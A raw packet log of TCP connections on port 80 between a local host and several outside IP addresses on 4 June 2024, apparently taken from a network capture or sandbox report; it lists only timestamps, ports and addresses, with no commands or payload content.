                                        Jun 4, 2024 14:36:11.390867949 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.390980005 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.391005039 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.391014099 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.391217947 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.391217947 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.391217947 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.391217947 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.392743111 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.393032074 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.395112038 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395222902 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395298004 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.395317078 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395459890 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.395459890 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.396996021 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397094965 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397106886 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397130966 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397139072 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397160053 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412358999 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412442923 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412591934 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412600994 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412806988 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412806988 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412950993 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412950993 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416299105 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416378021 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416430950 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416440964 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416495085 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.417047024 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.417210102 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.420032978 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.420140028 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.420357943 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.420537949 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.508650064 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.508753061 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.508831024 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.509021044 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.513106108 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.513117075 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.513262033 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.513262033 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.626024008 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.626218081 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:12.625289917 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.643255949 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.773367882 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:13.773550987 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.775433064 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.905427933 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020210981 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020225048 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020258904 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020270109 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020427942 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.025161982 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025274992 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025302887 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025360107 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025547028 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.025547028 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.029934883 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030011892 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030025005 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030119896 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030282974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.030282974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.033552885 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049653053 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049787998 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049799919 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049808979 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049814939 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.050069094 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.050491095 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.050687075 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.053751945 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053865910 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053878069 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053886890 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.054124117 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.054125071 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.054471016 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057079077 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057195902 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057209015 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057218075 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057240963 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.057461023 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.061774015 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061887980 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061899900 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061908007 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061985970 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.062129974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067476034 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067572117 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067583084 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067594051 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067828894 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067828894 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067868948 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067955971 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.068037987 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.068146944 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.068234921 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.073473930 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073579073 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073590994 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073599100 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073837996 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.084657907 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.084765911 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.084777117 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.084785938 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.085195065 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.085642099 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086119890 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086206913 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086218119 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086226940 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086426973 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086436987 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.086443901 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.086443901 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.086708069 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:15.280929089 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.298885107 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.429351091 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.429521084 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.431338072 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.561805010 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.561894894 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.653022051 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.653033972 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.653093100 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.653104067 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.653165102 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.653402090 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.655949116 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.656069994 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.656095028 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.656105995 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.656114101 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.656330109 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.656330109 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.662465096 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.662569046 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.662580967 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.662589073 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.662658930 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.662827969 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.683159113 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.683171988 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.683254957 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.683348894 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.683470964 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.683664083 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.683868885 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.687458038 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.687469959 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.687571049 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.687580109 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.687793970 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.687793970 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.687807083 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.689939976 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.690052032 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.690063000 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.690072060 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.690289021 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.690289021 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.690300941 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.690480947 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.694583893 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.694691896 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.694730997 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.694740057 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.694819927 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.694936037 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.697243929 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.697343111 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.697355032 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.697364092 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.697432995 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.697602987 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.697668076 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.697838068 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.700058937 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.700165033 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.700181961 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.700191021 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.700232029 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.700427055 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.701941013 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.701966047 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.702034950 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.702145100 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.702152967 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.702250004 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.702250004 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.702419043 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.733542919 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733642101 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733653069 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733664036 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733726025 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733906031 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.733906031 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.733968019 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.733978033 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.734184027 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.734244108 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.734421015 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:16.734718084 CEST804982123.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:16.734956026 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:17.936619043 CEST4982180192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:18.954528093 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.072009087 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.072124958 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.073797941 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.191509008 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.361792088 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.361805916 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.361848116 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.362087011 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.363451958 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:19.363646984 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.365711927 CEST4982280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:19.483095884 CEST804982223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:24.863636971 CEST4982380192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:25.072019100 CEST8049823217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:25.072227001 CEST4982380192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:25.075710058 CEST4982380192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:25.283901930 CEST8049823217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:25.285891056 CEST8049823217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:25.285902023 CEST8049823217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:25.286029100 CEST4982380192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:26.590807915 CEST4982380192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:27.608733892 CEST4982480192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:27.819396019 CEST8049824217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:27.819610119 CEST4982480192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:27.823105097 CEST4982480192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:28.033740044 CEST8049824217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:28.037385941 CEST8049824217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:28.037395954 CEST8049824217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:28.037611961 CEST4982480192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:29.340207100 CEST4982480192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:30.358246088 CEST4982580192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:30.566648960 CEST8049825217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:30.566937923 CEST4982580192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:30.569041014 CEST4982580192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:30.777430058 CEST8049825217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:30.780107975 CEST8049825217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:30.780117989 CEST8049825217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:30.780262947 CEST4982580192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:32.074038029 CEST4982580192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.091696024 CEST4982680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.299666882 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:33.299837112 CEST4982680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.301645994 CEST4982680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.509653091 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:33.514297009 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:33.514312983 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:33.514328957 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:33.514606953 CEST4982680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.518662930 CEST4982680192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:36:33.726692915 CEST8049826217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:36:55.122802973 CEST4982780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:55.348903894 CEST804982791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:55.349129915 CEST4982780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:55.351156950 CEST4982780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:55.577474117 CEST804982791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:55.577487946 CEST804982791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:55.577698946 CEST4982780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:56.865258932 CEST4982780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:57.883747101 CEST4982880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:58.109162092 CEST804982891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:58.109370947 CEST4982880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:58.111376047 CEST4982880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:58.336939096 CEST804982891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:58.337035894 CEST804982891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:36:58.337199926 CEST4982880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:36:59.614615917 CEST4982880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:00.632822037 CEST4982980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:00.857547998 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:00.857765913 CEST4982980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:00.859553099 CEST4982980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:01.084016085 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:01.084100962 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:01.084111929 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:01.084194899 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:01.084242105 CEST4982980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:01.308825970 CEST804982991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:03.382467985 CEST4983080192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:03.607029915 CEST804983091.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:03.607234955 CEST4983080192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:03.609122992 CEST4983080192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:03.833791018 CEST804983091.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:03.833803892 CEST804983091.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:03.834187031 CEST4983080192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:03.836822033 CEST4983080192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:04.061367035 CEST804983091.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:09.320616007 CEST4983180192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:09.451021910 CEST804983123.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:09.451267958 CEST4983180192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:09.453222036 CEST4983180192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:09.583492041 CEST804983123.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:09.588268995 CEST804983123.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:09.588387966 CEST804983123.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:09.588603020 CEST4983180192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:10.955851078 CEST4983180192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:11.974085093 CEST4983280192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:12.104106903 CEST804983223.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:12.104419947 CEST4983280192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:12.106271982 CEST4983280192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:12.236279011 CEST804983223.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:12.239658117 CEST804983223.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:12.240108967 CEST804983223.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:12.240283012 CEST4983280192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:13.611440897 CEST4983280192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:14.629517078 CEST4983380192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:14.762767076 CEST804983323.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:14.762963057 CEST4983380192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:14.764712095 CEST4983380192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:14.898066998 CEST804983323.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:15.074223042 CEST804983323.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:15.075886011 CEST804983323.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:15.076128006 CEST4983380192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:16.267185926 CEST4983380192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.285867929 CEST4983480192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.419342995 CEST804983423.82.12.29192.168.11.30
